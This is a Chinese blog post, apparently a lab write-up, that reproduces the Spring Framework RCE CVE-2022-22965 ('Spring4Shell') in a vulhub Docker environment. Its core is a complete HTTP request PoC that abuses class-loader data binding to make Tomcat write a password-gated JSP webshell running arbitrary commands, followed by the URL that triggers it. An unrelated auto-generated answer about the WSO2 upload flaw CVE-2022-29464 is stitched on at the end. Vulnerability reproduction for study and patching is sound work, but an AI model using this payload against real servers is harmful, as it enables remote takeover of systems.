Spring Framework RCE 通过 JDK 9+ 上的数据绑定 (CVE-2022-22965)

Spring Framework RCE(CVE-2022-22965)

0x00 漏洞原理

Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击
 
 

0x01 影响版本

Spring Framework < 5.3.18
Spring Framework < 5.2.20
 
 

0x02 利用条件

JDK 9 及以上版本
Apache Tomcat 作为 Servlet 容器
Spring 框架以及衍生的框架
 
 

0x03 环境搭建
cd vulhub-master/spring/CVE-2022-22965
docker-compose up -d

请添加图片描述

 
 

0x04 漏洞复现
 http://your-ip:8080/?name=Bob&age=25    #访问演示页面

请添加图片描述
 
 

访问对应的controller,这里设置了日志的文件名、文件路径、以及后缀名,将后缀名设置为.jsp,然后不断地写入执行命令的jsp代码,从而实现webshell的写入,还需要补充cookie

注:在访问演示页面的时候会生成一个cookie,只需要将其补充到POC中即可

POC

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Cookie: JSESSIONID=BF79D31B0D14243CDDCF09B53A40FC8C

请添加图片描述
 
 
请添加图片描述
 
 

http://ip:8080/tomcatwar.jsp?pwd=j&cmd=id  #访问刚写入的JSP Webshell,执行任意命令 

请添加图片描述

 
 
 
 
 

参考链接
https://vulhub.org/#/environments/spring/CVE-2022-22965/
https://mp.weixin.qq.com/s/QCxjtfQgewCrRC3QQ2x9rw

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
回答: CVE-2022-29464是WSO2文件上传漏洞的漏洞编号。该漏洞是一种未经身份验证的无限制任意文件上传漏洞,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得远程命令执行(RCE)的权限。\[3\]攻击者可以利用该漏洞上传恶意的JSP文件,并通过执行任意命令来控制服务器。这个漏洞的具体利用方式是通过在HTTP POST请求中上传恶意文件来实现的。\[2\]一旦攻击者成功利用该漏洞,他们可以执行任意命令,可能导致服务器被完全控制。因此,对于使用受影响版本的WSO2的用户来说,修复该漏洞是非常重要的。 #### 引用[.reference_title] - *1* *3* [【春秋云境】CVE-2022-29464](https://blog.csdn.net/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)](https://blog.csdn.net/FODKING/article/details/125746993)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值